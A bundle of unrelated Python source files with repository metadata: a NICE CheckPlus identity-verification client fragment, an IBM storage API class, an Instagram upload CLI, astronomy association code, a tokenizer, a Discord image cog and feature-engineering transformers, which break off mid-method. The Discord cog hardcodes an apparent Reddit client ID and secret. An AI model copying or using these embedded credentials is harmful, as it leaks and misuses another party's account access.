url = "https://nice.checkplus.co.kr/botdetectcaptcha"
res = self._session.get(url, params={
"get": "validation-result",
"c": "CAPTCHA",
"t": self._data
.get("BDC_DATA")
.get("BDC_VCID_CAPTCHA"),
"d": time, # TODO modify
"i": answer
})
is_success = (lambda x: x == "true")
if(is_success(res.text)):
res = self._session.post(url, data={
"m": "authMobile01Proc",
"authType": "SMS",
"menuId": self._menu_id,
"username": "",
"mynum1": "",
"mynum2": "",
"mobileno": "",
"BDC_VCID_CAPTCHA": "",
"BDC_BackWorkaround_CAPTCHA": "1",
"BDC_Hs_CAPTCHA": "",
"BDC_SP_CAPTCHA": "",
"answer": answer
})
def request_auth(self, type: str = "sms"):
pass
def check_auth(self, auth_number: str):
pass
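# --- Added illustrative sketch (not part of the original module). Typical call
# order for the PASSAgent API defined above; all literal values below are
# hypothetical placeholders and the real flow depends on the NICE CheckPlus service.
#
#   agent = PASSAgent()
#   agent.start(encode_data)                   # EncodeData issued by the service
#   agent.check_by_sms("SKT", "Hong Gildong", "990101", 1, "01012345678")
#   captcha_b64 = agent.get_captcha()          # base64-encoded CAPTCHA image
#   agent.check_captcha("captcha answer")      # submit the CAPTCHA solution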
| 26.464646 | 84 | 0.50458 |
4a2801d6dbbd6d520597c7493205f3fbe945b789 | 1,484 | py | Python | pyds8k/resources/ds8k/v1/lss.py | IBM/pyds8k | fb58f270e1ca8377ae0877a1f351cc222a937b49 | [
"Apache-2.0"
] | 7 | 2020-04-16T11:20:02.000Z | 2021-04-21T13:39:14.000Z | pyds8k/resources/ds8k/v1/lss.py | IBM/pyds8k | fb58f270e1ca8377ae0877a1f351cc222a937b49 | [
"Apache-2.0"
] | 1 | 2020-07-15T02:56:56.000Z | 2020-08-03T17:16:53.000Z | pyds8k/resources/ds8k/v1/lss.py | IBM/pyds8k | fb58f270e1ca8377ae0877a1f351cc222a937b49 | [
"Apache-2.0"
] | 6 | 2020-01-03T05:54:26.000Z | 2022-03-31T09:42:27.000Z | ##############################################################################
# Copyright 2019 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
"""
LSS interface.
"""
import six
from pyds8k.base import ManagerMeta, ResourceMeta
from .common.types import DS8K_LSS, DS8K_VOLUME
from .common.base import Base, ReadOnlyManager
from .common.mixins import VolumeMixin
@six.add_metaclass(ResourceMeta)
class LSS(VolumeMixin, Base):
resource_type = DS8K_LSS
# id_field = 'id'
_template = {'id': '',
'type': '',
'group': '',
'addrgrp': '',
'configvols': '',
DS8K_VOLUME: '',
}
related_resources_collection = (DS8K_VOLUME, )
@six.add_metaclass(ManagerMeta)
class LSSManager(ReadOnlyManager):
"""
Manage LSS resources.
"""
resource_class = LSS
resource_type = DS8K_LSS
| 30.916667 | 78 | 0.602426 |
4a28024edb5f5bc4ec2aad092817a9f2dc0fa4ea | 1,778 | py | Python | instapy_cli/__main__.py | MacherIT/pybuho | a0ceffe4bb5cf3d2e3ec1f32a39aafdb9601a952 | [
"MIT"
] | null | null | null | instapy_cli/__main__.py | MacherIT/pybuho | a0ceffe4bb5cf3d2e3ec1f32a39aafdb9601a952 | [
"MIT"
] | null | null | null | instapy_cli/__main__.py | MacherIT/pybuho | a0ceffe4bb5cf3d2e3ec1f32a39aafdb9601a952 | [
"MIT"
] | null | null | null | import sys
from platform import python_version
from instapy_cli.cli import InstapyCli as client
from optparse import OptionParser
import pkg_resources # part of setuptools
version = pkg_resources.require('instapy_cli')[0].version
'''
TODO:
- use instapy_cli.media to download image link and use it for upload and configure_photo
- rewrite main to support file and links for media
'''
def main(args=None):
welcome_msg = 'instapy-cli'
print('instapy ' + version + ' | python ' + python_version())
# cli = client()
# cli.loop(args)
parser = OptionParser(usage="usage: %prog [options]")
parser.add_option('-u', dest='username', help='username')
parser.add_option('-p', dest='password', help='password')
parser.add_option('-f', dest='file', help='file path or url')
parser.add_option('-t', dest='caption', help='caption text')
# parser.add_option('-h', dest='help', help='help')
(options, args) = parser.parse_args(args)
if args is None or (
not options.username and
not options.password and
not options.file and
not options.caption
):
print('[USE] instapy -u USR -p PSW -f FILE/LINK -t \'TEXT CAPTION\'')
print('\nFor other reference go to >> https://github.com/b3nab/instapy-cli')
return
if not options.username:
parser.error('Username is required')
password = options.password
if not options.password:
import getpass
password = getpass.getpass()
if not options.file:
parser.error('File path or url link is required to create a media to upload')
with client(options.username, password) as cli:
text = options.caption or ''
return cli.upload(options.file, text)
if __name__ == '__main__':
main()
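# --- Added illustrative note (not part of the original module). Example CLI
# invocation matching the usage text printed above; all values are placeholders:
#
#   instapy -u YOUR_USERNAME -p YOUR_PASSWORD -f ./photo.jpg -t 'my caption'
#
# If -p is omitted, the password is prompted interactively via getpass.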
| 33.54717 | 88 | 0.666479 |
4a2802fcb82074da25c63c8f17ecc70356df3da9 | 10,278 | py | Python | astropath/bayesian.py | FRBs/path | 9a8d50a9f7c6f48167e5fde06c0b0d1eb6784757 | [
"BSD-3-Clause"
] | null | null | null | astropath/bayesian.py | FRBs/path | 9a8d50a9f7c6f48167e5fde06c0b0d1eb6784757 | [
"BSD-3-Clause"
] | null | null | null | astropath/bayesian.py | FRBs/path | 9a8d50a9f7c6f48167e5fde06c0b0d1eb6784757 | [
"BSD-3-Clause"
] | null | null | null | """Methods related to Bayesian association analysis"""
import warnings
from typing import IO
import numpy as np
from astropy import units
from astropath import localization
from IPython import embed
sqarcsec_steradians = 4 * np.pi * (1 / 3600 / 3600) / (180. / np.pi) ** 2
def pw_Oi(theta, phi, theta_prior):
"""
Calculate p(w|O_i) for a given galaxy
Must integrate to 1 when integrating over w
Args:
theta (np.ndarray):
offset from galaxy center in arcsec
phi (float):
Angular size of the galaxy in arcsec
theta_prior (dict):
Parameters for theta prior
Three methods are currently supported: core, uniform, exp
See docs for further details
Returns:
np.ndarray: Probability values without grid-size normalization
"""
p = np.zeros_like(theta)
ok_w = theta < theta_prior['max']*phi
if theta_prior['PDF'] == 'core':
# Wolfram
norm = 2 * np.pi * phi**2 * (theta_prior['max']/phi - np.log(theta_prior['max']/phi+1))
#norm = phi * np.log(theta_prior['max']/phi+1)
if np.any(ok_w):
p[ok_w] = phi / (theta[ok_w] + phi) / norm
elif theta_prior['PDF'] == 'uniform':
norm = np.pi * (phi*theta_prior['max'])**2
if np.any(ok_w):
p[ok_w] = 1. / norm
elif theta_prior['PDF'] == 'exp':
# Wolfram
#norm = phi - np.exp(-scale_half*theta_prior['max']/phi) * (scale_half*theta_prior['max'] + phi)
phi = phi * theta_prior['scale']
norm = 2 * np.pi * phi**2 * (1 - (1+theta_prior['max']/phi)*np.exp(
-theta_prior['max']/phi))
if np.any(ok_w):
p[ok_w] = np.exp(-theta[ok_w]/phi) / norm
else:
raise IOError("Bad theta PDF")
#
if norm == 0:
raise ValueError("You forgot to normalize!")
# Return
return p
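# --- Added illustrative example (not part of the original module). A minimal
# sketch of evaluating the offset prior; the theta_prior keys ('PDF', 'max',
# 'scale') follow the conventions used in pw_Oi above.
#
#   theta = np.linspace(0., 5., 6)               # offsets in arcsec
#   prior = dict(PDF='exp', max=6., scale=0.5)
#   p = pw_Oi(theta, 1.0, prior)                 # phi = 1 arcsec; values are not grid-normalized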
def px_Oi_fixedgrid(box_hwidth, localiz, cand_coords,
cand_ang_size, theta_prior, step_size=0.1,
return_grids=False):
"""
Calculate p(x|O_i), the primary piece of the analysis
Main concept:
1. Set an area to analyze
2. Discretize it to the step-size (e.g. 0.1")
3. Convolve the localization with the galaxy offset function
Args:
box_hwidth (float):
Half-width of the analysis box, in arcsec
localiz (dict):
Defines the localization
Used to calculate L(x-w)
cand_coords (SkyCoord):
Coordinates of the candidate host centroids of O_i
cand_ang_size (np.ndarray):
Angular sizes of the candidates
theta_prior (dict):
Parameters for theta prior
step_size (float, optional):
Step size for grid, in arcsec
return_grids (bool, optional):
if True, return the calculation grid
Returns:
np.ndarray or tuple: p(x|O_i) values and the grids if return_grids = True
"""
# Checks
if 'center_coord' not in localiz.keys():
#
        raise IOError("To use this method, you need to specify a center for the fixed grid via center_coord in localiz")
# Set Equinox (for spherical offsets)
localiz['center_coord'].equinox = cand_coords[0].equinox
# Build the fixed grid around the transient
ngrid = int(np.round(2*box_hwidth / step_size))
x = np.linspace(-box_hwidth, box_hwidth, ngrid)
xcoord, ycoord = np.meshgrid(x,x)
# Grid spacing
grid_spacing_arcsec = x[1]-x[0]
# #####################
# L(w-x) -- 2D Gaussian, normalized to 1 when integrating over x not omega
# Approximate as flat sky
# Warning: RA increases in x for these grids!!
ra = localiz['center_coord'].ra.deg + \
xcoord/3600. / np.cos(localiz['center_coord'].dec).value
dec = localiz['center_coord'].dec.deg + ycoord/3600.
L_wx = localization.calc_LWx(ra, dec, localiz)
p_xOis, grids = [], []
# TODO -- multiprocess this
for icand, cand_coord in enumerate(cand_coords):
# Offsets from the transient (approximate + flat sky)
theta = 3600*np.sqrt(np.cos(cand_coord.dec).value**2 * (
ra-cand_coord.ra.deg)**2 + (dec-cand_coord.dec.deg)**2) # arc sec
# p(w|O_i)
p_wOi = pw_Oi(theta,
cand_ang_size[icand], # phi
theta_prior)
# Product
grid_p = L_wx * p_wOi
# Save grids if returning
if return_grids:
grids.append(grid_p.copy())
# Sum
p_xOis.append(np.sum(grid_p)*grid_spacing_arcsec**2)
# Return
if return_grids:
return np.array(p_xOis), grids
else:
return np.array(p_xOis)
def px_Oi_local(localiz, cand_coords, cand_ang_size,
theta_prior, step_size=0.1, debug = False):
"""
Args:
localiz (dict):
Defines the localization
Used to calculate L(x-w)
See localization.py for the Data model
cand_coords (astropy.coordinates.SkyCoord):
SkyCoord object for the candidate galaxies
cand_ang_size (np.ndarray):
Angular sizes of the candidates
theta_prior (dict):
Contains information related to the offset function
This includes the angular size "ang_size" in units of arcsec
here referred to as phi.
step_size (float, optional):
Step size of the galaxy grid scaled by phi
debug (bool, optional):
If true, hit an embed in the main loop
Returns:
np.ndarray or tuple: p(x|O_i) values and the grids if return_grids = True
"""
# Loop on galaxies
p_xOis = []
for icand, cand_coord in enumerate(cand_coords):
# Prep
phi_cand = cand_ang_size[icand] # arcsec
step_size_phi = phi_cand * step_size # arcsec
box_hwidth = phi_cand * theta_prior['max'] # arcsec
# Grid around the galaxy
ngrid = int(np.round(2 * box_hwidth / step_size_phi))
x = np.linspace(-box_hwidth, box_hwidth, ngrid)
xcoord, ycoord = np.meshgrid(x,x)
theta = np.sqrt(xcoord**2 + ycoord**2)
# p(w|O)
p_wOi = pw_Oi(theta, phi_cand, theta_prior)
# Generate coords for transient localiation (flat sky)
ra = cand_coord.ra.deg + \
xcoord/3600. / np.cos(cand_coord.dec).value
dec = cand_coord.dec.deg + ycoord/3600.
# Calculate
L_wx = localization.calc_LWx(ra, dec, localiz)
# Finish
grid_p = L_wx * p_wOi
#
p_xOis.append(np.sum(grid_p)*step_size_phi**2)
# Debug
if debug:
embed(header='207 of bayesian.py')
# Return
return np.array(p_xOis)
def px_U(box_hwidth):
"""
Args:
box_hwidth (float):
Half-width of the analysis box, in arcsec
Returns:
float: p(x|U)
"""
box_sqarcsec = (2*box_hwidth)**2
#box_steradians = box_sqarcsec * sqarcsec_steradians
#
return 1./box_sqarcsec # box_steradians
def px_Oi_orig(box_hwidth, center_coord, eellipse, cand_coords,
               theta_prior, step_size=0.1, return_grids=False):
"""
DEPRECATED!
Calculate p(x|O_i), the primary piece of the analysis
Main concept:
0. Set an area to analyze
1. Discretize it to the step-size (e.g. 0.1")
2. Convolve the localization with the galaxy offset function
Args:
box_hwidth (float):
Half-width of the analysis box, in arcsec
center_coord (SkyCoord):
Observed position of the transient (x)
eellipse (dict):
Error ellipse for the transient
a, b in arcsec, theta (PA) in deg
This defines L(x-w)
cand_coords (SkyCoord):
Coordinates of the candidate host centroids of O_i
theta_prior (dict):
Parameters for theta prior
step_size (float, optional):
Step size for grid, in arcsec
return_grids (bool, optional):
            if True, return the calculation grid
Returns:
np.ndarray or tuple: p(x|O_i) values and the grids if return_grids = True
"""
warnings.warn(DeprecationWarning)
# Error ellipse
pa_ee = eellipse['theta'] # PA of transient error ellipse on the sky; deg
    dtheta = 90. - pa_ee # Rotation to place the semi-major axis "a" of the ellipse along the x-axis we define
# Set Equinox (for spherical offsets)
    center_coord.equinox = cand_coords[0].equinox
#
    ngrid = int(np.round(2*box_hwidth / step_size))
x = np.linspace(-box_hwidth, box_hwidth, ngrid)
xcoord, ycoord = np.meshgrid(x,x)
# Grid spacing
    grid_spacing_arcsec = x[1]-x[0]
    #grid_spacing_steradian = sqarcsec_steradians * grid_spacing_arcsec**2
# #####################
# Build the grid around the transient (orient semi-major axis "a" on our x axis)
    # L(w-x) -- 2D Gaussian, normalized to 1 when integrating over x not omega
    L_wx = np.exp(-xcoord ** 2 / (2 * eellipse['a'] ** 2)) * np.exp(
        -ycoord ** 2 / (2 * eellipse['b'] ** 2)) / (2*np.pi*eellipse['a']*eellipse['b'])
p_xOis, grids = [], []
# TODO -- multiprocess this
for icand, cand_coord in enumerate(cand_coords):
# Rotate the galaxy
r = center_coord.separation(cand_coord).to('arcsec')
pa_gal = center_coord.position_angle(cand_coord).to('deg')
new_pa_gal = pa_gal + dtheta * units.deg
# p(w|O_i)
# x, y gal
x_gal = -r.value * np.sin(new_pa_gal).value
y_gal = r.value * np.cos(new_pa_gal).value
        theta = np.sqrt((xcoord-x_gal)**2 + (ycoord-y_gal)**2) # arc sec
p_wOi = pw_Oi(theta,
theta_prior['ang_size'][icand], # phi
theta_prior)
# Product
grid_p = L_wx * p_wOi
# Save grids if returning
if return_grids:
grids.append(grid_p.copy())
# Sum
        p_xOis.append(np.sum(grid_p)*grid_spacing_arcsec**2)
#import pdb; pdb.set_trace()
# Return
if return_grids:
return np.array(p_xOis), grids
else:
return np.array(p_xOis)
| 32.628571 | 120 | 0.595349 |
4a28031db8d9850f65de7f669b11456b16141a56 | 6,437 | py | Python | utokenize/utokenize.py | MaxTurchin/pycopy-lib | d7a69fc2a28031e2ca475c29239f715c1809d8cc | [
"PSF-2.0"
] | null | null | null | utokenize/utokenize.py | MaxTurchin/pycopy-lib | d7a69fc2a28031e2ca475c29239f715c1809d8cc | [
"PSF-2.0"
] | null | null | null | utokenize/utokenize.py | MaxTurchin/pycopy-lib | d7a69fc2a28031e2ca475c29239f715c1809d8cc | [
"PSF-2.0"
] | null | null | null | # (c) 2019 Paul Sokolovsky, MIT license
# This module is part of the Pycopy project, https://github.com/pfalcon/pycopy
from token import *
from ucollections import namedtuple
import uio
COMMENT = N_TOKENS + 0
NL = N_TOKENS + 1
ENCODING = N_TOKENS + 2
tok_name[COMMENT] = "COMMENT"
tok_name[NL] = "NL"
tok_name[ENCODING] = "ENCODING"
class TokenInfo(namedtuple("TokenInfo", ("type", "string", "start", "end", "line"))):
def __str__(self):
return "TokenInfo(type=%d (%s), string=%r, startl=%d, line=%r)" % (
self.type, tok_name[self.type], self.string, self.start, self.line
)
def get_indent(l):
for i in range(len(l)):
if l[i] != " " and l[i] != "\t":
return i, l[i:]
def get_str(l, readline):
lineno = 0
s = uio.StringIO()
if l.startswith('"""') or l.startswith("'''"):
sep = l[0:3]
s += sep
l = l[3:]
pos = 0
while True:
i = l.find(sep, pos)
if i >= 0:
if i > 0 and l[i - 1] == "\\":
pos = i + 1
continue
break
s += l
l = readline()
pos = 0
assert l
lineno += 1
s += l[:i + 3]
return s.getvalue(), l[i + 3:], lineno
lbuf = uio.StringIO(l)
sep = lbuf.read(1)
s += sep
while True:
c = lbuf.read(1)
if not c:
break
s += c
if c == "\\":
c = lbuf.read(1)
s += c
if c == "\n":
lbuf = uio.StringIO(readline())
lineno += 1
continue
elif c == sep:
break
return s.getvalue(), lbuf.read(), lineno
def tokenize(readline):
indent_stack = [0]
lineno = 0
paren_level = 0
yield TokenInfo(ENCODING, "utf-8", 0, 0, "")
while True:
l = readline()
lineno += 1
org_l = l
if not l:
break
i, l = get_indent(l)
if l == "\n":
yield TokenInfo(NL, l, lineno, 0, org_l)
continue
elif l == "\x0c\n":
yield TokenInfo(NL, "\n", lineno, 0, org_l)
continue
if l.startswith("#"):
yield TokenInfo(COMMENT, l.rstrip("\n"), lineno, 0, org_l)
yield TokenInfo(NL, "\n", lineno, 0, org_l)
continue
if paren_level == 0:
if i > indent_stack[-1]:
yield TokenInfo(INDENT, org_l[:i], lineno, 0, org_l)
indent_stack.append(i)
elif i < indent_stack[-1]:
while i != indent_stack[-1]:
yield TokenInfo(DEDENT, "", lineno, 0, org_l)
indent_stack.pop()
while l:
if l[0].isdigit() or (l.startswith(".") and len(l) > 1 and l[1].isdigit()):
seen_dot = False
t = ""
if l.startswith("0x") or l.startswith("0X"):
t = "0x"
l = l[2:]
elif l.startswith("0o") or l.startswith("0O"):
t = "0o"
l = l[2:]
elif l.startswith("0b") or l.startswith("0B"):
t = "0b"
l = l[2:]
while l and (l[0].isdigit() or l[0] == "." or l[0] == "_" or (t.startswith("0x") and l[0] in "ABCDEFabcdef")):
if l[0] == ".":
if seen_dot:
break
seen_dot = True
t += l[0]
l = l[1:]
if l.startswith("e") or l.startswith("E"):
t += l[0]
l = l[1:]
if l[0] in ("+", "-"):
t += l[0]
l = l[1:]
while l and (l[0].isdigit() or l[0] == "_"):
t += l[0]
l = l[1:]
if l.startswith("j"):
t += l[0]
l = l[1:]
yield TokenInfo(NUMBER, t, lineno, 0, org_l)
elif l[0].isalpha() or l.startswith("_") or ord(l[0]) >= 0xaa:
name = ""
while l and (l[0].isalpha() or l[0].isdigit() or l.startswith("_") or ord(l[0]) >= 0xaa):
name += l[0]
l = l[1:]
if (l.startswith('"') or l.startswith("'")) and name in ("b", "r", "rb", "br", "u", "f"):
s, l, lineno_delta = get_str(l, readline)
yield TokenInfo(STRING, name + s, lineno, 0, org_l)
lineno += lineno_delta
else:
yield TokenInfo(NAME, name, lineno, 0, org_l)
elif l == "\\\n":
l = readline()
lineno += 1
elif l[0] == "\n":
if paren_level > 0:
yield TokenInfo(NL, "\n", lineno, 0, org_l)
else:
yield TokenInfo(NEWLINE, "\n", lineno, 0, org_l)
break
elif l[0].isspace():
l = l[1:]
elif l.startswith('"') or l.startswith("'"):
s, l, lineno_delta = get_str(l, readline)
yield TokenInfo(STRING, s, lineno, 0, org_l)
lineno += lineno_delta
elif l.startswith("#"):
yield TokenInfo(COMMENT, l.rstrip("\n"), lineno, 0, org_l)
l = "\n"
else:
for op in (
"**=", "//=", ">>=", "<<=", "+=", "-=", "*=", "/=",
"%=", "@=", "&=", "|=", "^=", "**", "//", "<<", ">>",
"==", "!=", ">=", "<=", "...", "->"
):
if l.startswith(op):
yield TokenInfo(OP, op, lineno, 0, org_l)
l = l[len(op):]
break
else:
yield TokenInfo(OP, l[0], lineno, 0, org_l)
if l[0] in ("(", "[", "{"):
paren_level += 1
elif l[0] in (")", "]", "}"):
paren_level -= 1
l = l[1:]
while indent_stack[-1] > 0:
yield TokenInfo(DEDENT, "", lineno, 0, "")
indent_stack.pop()
yield TokenInfo(ENDMARKER, "", lineno, 0, "")
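# --- Added illustrative usage (not part of the original module): tokenize()
# takes a readline callable, mirroring CPython's tokenize module.
if __name__ == "__main__":
    _buf = uio.StringIO("x = 1 + 2\n")
    for _tok in tokenize(_buf.readline):
        print(_tok)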
| 32.841837 | 126 | 0.388069 |
4a2803d6746a029ea0407a9a1734144e056fbe30 | 4,209 | py | Python | cogs/images.py | Stift007/OctoCat | 0ea54c106ae6321a62e9ab459aede7efd2116c3e | [
"MIT"
] | null | null | null | cogs/images.py | Stift007/OctoCat | 0ea54c106ae6321a62e9ab459aede7efd2116c3e | [
"MIT"
] | null | null | null | cogs/images.py | Stift007/OctoCat | 0ea54c106ae6321a62e9ab459aede7efd2116c3e | [
"MIT"
] | null | null | null | import os
import discord
import random
from io import BytesIO
import aiohttp
from discord.ext import commands
import praw
import requests
from data import reddit
from PIL import Image
APP_ID = reddit.APP_ID
SECRET = reddit.SECRET
class Images(commands.Cog):
def __init__(self,bot):
self.bot = bot
@commands.command()
async def avatarfusion(this,ctx,member_1:discord.Member,member_2:discord.Member):
asset1 = member_1.avatar_url_as(size=128)
data1 = BytesIO(await asset1.read())
asset2 = member_2.avatar_url_as(size=128)
data2 = BytesIO(await asset2.read())
background = Image.open(data1)
foreground = Image.open(data2)
background.paste(foreground, (0, 0), foreground)
background.save(f"overlay{ctx.author.id}.png")
await ctx.reply(file=discord.File(f"overlay{ctx.author.id}.png"))
os.remove(f"overlay{ctx.author.id}.png")
@commands.command()
async def reddit(self,ctx,subreddit:str = ""):
if subreddit in open("data/REDDIT_NSFW_SUBS").read() and not ctx.channel.is_nsfw():
return await ctx.send("NSFW Subreddits are locked outside of NSFW-Marked channels.")
subreddit = subreddit.replace("r/","")
reddit = praw.Reddit(client_id="ON1G_de1I2-cFIaAUWB7ew",
client_secret="YUvMk-ZianKdX7AJ_vCQOxlLUVaHaQ",
user_agent="<agentOcto:1.0.0>")
sub = reddit.subreddit(subreddit)
subs = []
for submission in sub.top(limit=50):
subs.append(submission)
random_sub = random.choice(subs)
name = random_sub.title
url = random_sub.url
comments = random_sub.num_comments
updoots = random_sub.score
embed = discord.Embed(title=name).set_image(url=url).set_footer(text=f"💬 {comments} / 👍 {updoots}")
await ctx.send(embed=embed)
#This here is One of three Commands on one of 7 Extensions
@commands.command()
async def meme(self,ctx):
async with aiohttp.ClientSession() as cs:
async with cs.get("https://www.reddit.com/r/memes.json") as r:
memes = await r.json()
embed = discord.Embed(
color=discord.Color.purple()
)
embed.set_image(url=memes["data"]["children"][random.randint(0,25)]["data"]["url"])
embed.set_footer(text=f'Powered by r/memes | Meme requested by {ctx.author}')
await ctx.send(embed=embed)
@commands.command()
async def cat(self,ctx):
async with ctx.channel.typing():
async with aiohttp.ClientSession() as cs:
async with cs.get("http://aws.random.cat/meow") as r:
data = await r.json()
embed = discord.Embed(title="Meow",color=discord.Color.random())
embed.set_image(url=data['file'])
embed.set_footer(text="http://random.cat/")
await ctx.send(embed=embed)
@commands.command()
async def dog(self,ctx):
async with ctx.channel.typing():
async with aiohttp.ClientSession() as cs:
async with cs.get("https://random.dog/woof.json") as r:
data = await r.json()
embed = discord.Embed(title="Woof",color=discord.Color.random())
embed.set_image(url=data['url'])
embed.set_footer(text="http://random.dog/")
await ctx.send(embed=embed)
@commands.command(aliases=["floof"])
async def fox(self,ctx):
async with ctx.channel.typing():
async with aiohttp.ClientSession() as cs:
async with cs.get("https://randomfox.ca/floof") as r:
data = await r.json()
embed = discord.Embed(title="Floofy",color=discord.Color.random())
embed.set_image(url=data['image'])
embed.set_footer(text="http://randomfox.ca/")
await ctx.send(embed=embed)
def setup(bot):
bot.add_cog(Images(bot))
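# --- Added illustrative note (not part of the original cog). In the host bot this
# extension would typically be loaded with something like
#   bot.load_extension("cogs.images")
# (the extension path is an assumption based on the cogs/ directory layout).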
| 36.284483 | 107 | 0.594916 |
4a280667fb44f8652873298c09961a3156df0849 | 315 | py | Python | variation1.py | benjamin-wilkins/trigonometry-circles | c366f72e520c4556c82699652e0345b5b3e15f32 | [
"MIT"
] | null | null | null | variation1.py | benjamin-wilkins/trigonometry-circles | c366f72e520c4556c82699652e0345b5b3e15f32 | [
"MIT"
] | null | null | null | variation1.py | benjamin-wilkins/trigonometry-circles | c366f72e520c4556c82699652e0345b5b3e15f32 | [
"MIT"
] | null | null | null | import math, turtle
turtle = turtle.Turtle()
turtle.speed(0)
def findPoints(radius):
for i in range(361):
y = radius * math.sin(0.01745329 * i)
yield [0, y]
x = radius * math.cos(0.01745329 * i)
yield [x, 0]
yield [x, y]
for i in findPoints(200):
turtle.goto(i) | 22.5 | 45 | 0.565079 |
4a280761fc7b947add578c843533b7d744117363 | 7,034 | py | Python | src/feature/feature.py | Adam1679/fraud-detection | b84169ad2ab9383e9cc463fb286aba26a31fd161 | [
"MIT"
] | null | null | null | src/feature/feature.py | Adam1679/fraud-detection | b84169ad2ab9383e9cc463fb286aba26a31fd161 | [
"MIT"
] | null | null | null | src/feature/feature.py | Adam1679/fraud-detection | b84169ad2ab9383e9cc463fb286aba26a31fd161 | [
"MIT"
] | null | null | null | from sklearn.base import BaseEstimator, TransformerMixin
import json
import numpy as np
import pandas as pd
from itertools import product
class Email_Engineering(BaseEstimator, TransformerMixin):
"""
    Groups the overly large number of email domains into a smaller set of categories for processing.
credit to ``https://www.kaggle.com/amirhmi/a-comprehensive-guide-to-get-0-9492``
"""
def __init__(self, names):
if not isinstance(names, list):
self.names = list(names)
else:
self.names = names
self.us_emails = {'gmail', 'net', 'edu'}
with open("./ieee-fraud-detection/email.json") as f:
self.emails = json.load(f)
def fit(self, x, y=None):
return self
def transform(self, x):
for c in self.names:
x[c + "_bin"] = x[c].map(self.emails)
x[c + '_suffix'] = x[c].map(lambda x: str(x).split('.')[-1])
x[c + '_suffix'] = x[c + '_suffix'].map(lambda x: x if str(x) not in self.us_emails else 'us')
x['is_proton_mail'] = (x['P_emaildomain'] == 'protonmail.com') | (x['R_emaildomain'] == 'protonmail.com')
return x
class Browser_Engineering(BaseEstimator, TransformerMixin):
"""
    Flags whether the user's browser is one of the latest browser versions.
credit to ``https://www.kaggle.com/amirhmi/a-comprehensive-guide-to-get-0-9492``
"""
def __init__(self, name, verbose=1):
self.name = name
self.verbose = verbose
with open("./ieee-fraud-detection/latest_browsers.txt") as f:
self.latest_browser = set(map(str.strip, f.readlines()))
def fit(self, x, y=None):
return self
def transform(self, x):
nan_mask = x[self.name].isnull()
x['is_latest_browser'] = x[self.name].fillna("NaN")
x['is_latest_browser'] = x['is_latest_browser'].map(lambda y: 1 if y in self.latest_browser else 0)
x['is_latest_browser'] = x['is_latest_browser'].astype(np.int8)
x.loc[nan_mask, 'is_latest_browser'] = np.nan
if self.verbose:
print(
f"Summarize: # of 1 = {x['is_latest_browser'].sum()}, # of NaN = {x['is_latest_browser'].isnull().sum()}")
return x
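# --- Added illustrative usage (not part of the original module). A minimal sketch,
# assuming a DataFrame with the IEEE fraud-detection columns referenced above;
# the 'id_31' browser column name is an assumption.
#
#   from sklearn.pipeline import Pipeline
#   pipe = Pipeline([
#       ('email', Email_Engineering(['P_emaildomain', 'R_emaildomain'])),
#       ('browser', Browser_Engineering('id_31')),
#   ])
#   train = pipe.fit_transform(train)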
class Std_2var_Engineering(BaseEstimator, TransformerMixin):
"""
    Two-variable interaction (std): numerical feature divided by its group-wise standard deviation.
credit to ``https://www.kaggle.com/amirhmi/a-comprehensive-guide-to-get-0-9492``
"""
def __init__(self, numerical_features, categorical_features, verbose=1):
self.n_feas = list(numerical_features)
self.c_feas = list(categorical_features)
self.verbose = verbose
def fit(self, x, y=None):
return self
def transform(self, x):
for a, b in product(self.n_feas, self.c_feas):
nan_mask = x[a].isnull() | x[b].isnull()
name = a + "_to_std_" + b
x[name] = x[a] / x.groupby([b])[a].transform('std')
x.loc[nan_mask, name] = np.nan
if self.verbose:
print(f"Generate: {name}")
return x
class Mean_2var_Engineering(BaseEstimator, TransformerMixin):
"""
    Two-variable interaction (mean): numerical feature divided by its group-wise mean.
credit to ``https://www.kaggle.com/amirhmi/a-comprehensive-guide-to-get-0-9492``
"""
def __init__(self, numerical_features, categorical_features, verbose=1):
self.n_feas = list(numerical_features)
self.c_feas = list(categorical_features)
self.verbose = verbose
def fit(self, x, y=None):
return self
def transform(self, x):
for a, b in product(self.n_feas, self.c_feas):
nan_mask = x[a].isnull() | x[b].isnull()
name = a + "_to_mean_" + b
x[name] = x[a] / x.groupby([b])[a].transform('mean')
x.loc[nan_mask, name] = np.nan
if self.verbose:
print(f"Generate: {name}")
return x
class Add_2var_Engineering(BaseEstimator, TransformerMixin):
"""
    Interaction of two (or three) categorical variables by concatenation.
credit to ``https://www.kaggle.com/amirhmi/a-comprehensive-guide-to-get-0-9492``
"""
def __init__(self, feature_pairs, verbose=1):
self.pairs = list(feature_pairs)
self.verbose = verbose
def fit(self, x, y=None):
return self
def transform(self, x):
for feas in self.pairs:
name = None
if len(feas) == 2:
a, b = feas
nan_mask = x[a].isnull() | x[b].isnull()
name = a + "_" + b
x[name] = x[a].astype(str) + "_" + x[b].astype(str)
elif len(feas) == 3:
a, b, c = feas
nan_mask = x[a].isnull() | x[b].isnull() | x[c].isnull()
name = a + "_" + b + "_" + c
x[name] = x[a].astype(str) + "_" + x[b].astype(str) + "_" + x[c].astype(str)
x.loc[nan_mask, name] = np.nan
if self.verbose:
print(f"Generate: {name}")
return x
class Count_Engineering(BaseEstimator, TransformerMixin):
"""
    Adds frequency (count) information for categorical variables.
credit to ``https://www.kaggle.com/cdeotte/200-magical-models-santander-0-920``
"""
def __init__(self, categorical_features, verbose=1):
self.names = list(categorical_features)
self.verbose = verbose
self.counts = dict()
def fit(self, x, y=None):
for c in self.names:
self.counts[c] = x[c].value_counts(dropna=False)
return self
def transform(self, x):
for c in self.names:
name = c + "_count"
nan_mask = x[c].isnull()
if not (c in self.counts):
self.counts[c] = x[c].value_counts(dropna=False)
if name in x.columns:
name += "X"
x[name] = x[c].map(self.counts[c])
x.loc[nan_mask, name] = np.nan
if self.verbose:
print(f"Generate: {name}")
return x
class Drop_Features(BaseEstimator, TransformerMixin):
"""
    Drops some features (those with too many missing or duplicated values).
credit to ``https://www.kaggle.com/amirhmi/a-comprehensive-guide-to-get-0-9492``
"""
def __init__(self, percentage, percentage_dup, verbose=1):
self.perc = percentage
self.perc_dup = percentage_dup
self.verbose = verbose
def fit(self, x, y=None):
